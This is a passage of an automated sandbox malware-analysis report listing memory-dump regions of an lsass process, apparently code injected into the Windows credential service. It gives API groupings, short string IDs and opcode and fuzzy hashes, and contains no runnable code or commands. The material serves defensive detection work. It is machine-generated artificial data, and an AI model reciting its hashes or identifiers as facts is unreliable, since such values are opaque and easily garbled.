                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: be16916117c4c5d8465fbac92c3bfb4ddd2eef5abb0f374461f5f83441254e7b
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 1E014C75219F4882FB249B61F84879973B0BF49B45F080128DA8D073AAEF3DC0DAC780
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction ID: 682f90f5b637f35a2c3d5446783d20b17b34457fb52783b3e1abf76f5c572ba5
                                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                  • Instruction Fuzzy Hash: 38F04F72308B8992EB208F25F9843997371FB45BC8F884021DB4D4695ADE6CC6CACB80
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction ID: 549d6b3f5c5617265924b4db8807741ab2b98ea511b45a10dbd99b22b46e9c1f
                                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                  • Instruction Fuzzy Hash: F1F08CB4708F8982EA148B13B914199A670BF48FC0F4C8430EE4E07B1ADE6CC4C78780
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction ID: c7a77935cd3ff50cc22bbf61a466c25b5755c83e5add7d4d4005042facc3e205
                                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                  • Instruction Fuzzy Hash: 18F09071208F4981EB108B24F8843A96330EF89760F5C0219DA7E455E6CF3CC4CAC7C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction ID: 8125674789d92a5479a628aecd600cb6081226b1809075a8aed29d4977de2a50
                                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                  • Instruction Fuzzy Hash: F202B63221DB8886EB61CF55F4903AAB7B0F785794F140015EA8E87BA9DBBCD495CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: 8766a97f31f53a2c0922cdae98632e9cd144d5ee2a52e1ef2e78a76bd73733b5
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 60518335608F0587E764CB16F84079AB7B0FB84B84F5881199E4E43756DF78C98BCB80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID:
                                                  • API String ID: 3702945584-0
                                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction ID: 954548f2d2f2eb1727b34777494260f77ffc5ea29933f4fc2f9ab99450d76c11
                                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                  • Instruction Fuzzy Hash: 23516335218B498BE724CF16B84079AB7B1FB84B84F584119DE4E4375ADF78D98BCB40
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction ID: a0d3d935ebb2149f436fe8553ea03842cde1fcc6533f6d8c8d18eb5ce2a62dd7
                                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                                  • Instruction Fuzzy Hash: 3E61B63612DB8886E761CF15F4543AAB7B0F788744F540115FA8D87BAADBBCD586CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 7a4681845d68765c2fe651341d7c065f2c313b53bf4c6282e3f71e70ffd23cd5
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: 5C114F36609B4493EB248B61F40429AA7B0FF45B80F080126DE8D037A9EF7DC9DAC7C4
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 875f8e91b8ec60e369ef0c0a4fa31e9cbd0d42de610c1aa331d7fb3e193f8215
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 1351CF32359F08CAEB58CB55F444BAC37B1EB54B98F188121DA5E4778ADBB9C8D2C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: d9f36c28b8368ba67f33a76669638aa3bbfff7f91a8384785df6904ca07c6f67
                                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction Fuzzy Hash: A1617C3250CBC885EB208B15F4407DABBB0FB95B98F485215EB9C17B96DBB8D1D6CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 611d291301d54a95b7270af50630b4b285e2c5ae5dac77d113480ec9eb855077
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 6951C13610CB988BEB748F12A5443A877B0FB50B84F1C6116DA9D47BD2CBB8E4E6C741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction ID: 9924569a5ab876b337d3d8800d55b27160b79a26f432793cf3b9df684b44e794
                                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                  • Instruction Fuzzy Hash: 7251803218CB488AEB748F11A68839877B0FB55B94F1C5116DA9D47B9FCB38C4D6CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction ID: 3339c7917aa704551e98117c40d034c359a0e0c72837dcb32f0ec74c5693b7a9
                                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                                  • Instruction Fuzzy Hash: DB115431318F8592EB209B35F8003DA66B4FF44781F9845259E8D83696EFA9C9C7C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction ID: 3298a726dc5465890309b67df4462229f4f7f8e3e357887ff85e25c4a6c59ccf
                                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                                  • Instruction Fuzzy Hash: B4D19B32718B4889E711CFA5E4407EC3BB5EB55B98F888216DE5D97B9ADA34C186C380
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 0f95c1dffc8255ab5602c6e5a498ab9dff0cbe01a932d44c9348a9f5b6c20eba
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 98011332619F98DAE714DF66B80428977B1FB89F80B094025DB4D53729DE38D4D2C780
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017D2DD628DF), ref: 0000017D2DD62A12
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction ID: aa166f6266bb96c49c0b0f95c8e07a40ccaf4e3586e99a536f9aed07c311213a
                                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                                  • Instruction Fuzzy Hash: 6A91B132618B5999FB608F65B4503ED2BB0FB55B98F4C9106DE4E67A8ADA34C4C7C3C0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 4157c9474ce7d2e752517023a27d0e78ade98282bef4b994be3812213f498eb2
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 2E113036754F088AEB00CF60F8543E833B4FB19758F880E21EA6D867A5DF78C1968380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.3382384800.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                  • Associated: 00000010.00000002.3381814822.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383134005.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3383844157.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384236690.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000010.00000002.3384560213.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d2dd50000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction ID: 13d1426295f582f1fef4479a0643aac2144f9f87ebd461d2444b396535ed9581
                                                  • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                                  • Instruction Fuzzy Hash: FB71D736208F8A52E734DF26B8443EA6BB4FB857C4F484016DD4D43B8ADEB5C68AC740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 3ac9d71f64e126eaf44fec6926ac91d70d8a3b8c0250537b7c388df9b0915fe2
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: D9518A32259F088AEB54CB15F448BA937B1EF54B98F198125EA4E4778FDB79D882C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000003.1604607101.0000017D2DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_3_17d2dd20000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                  • Instruction ID: 6277699836f2ef0ffb95fe119b8b3529a6a6aa0f2a0a27a23f57712dfb66d9c3
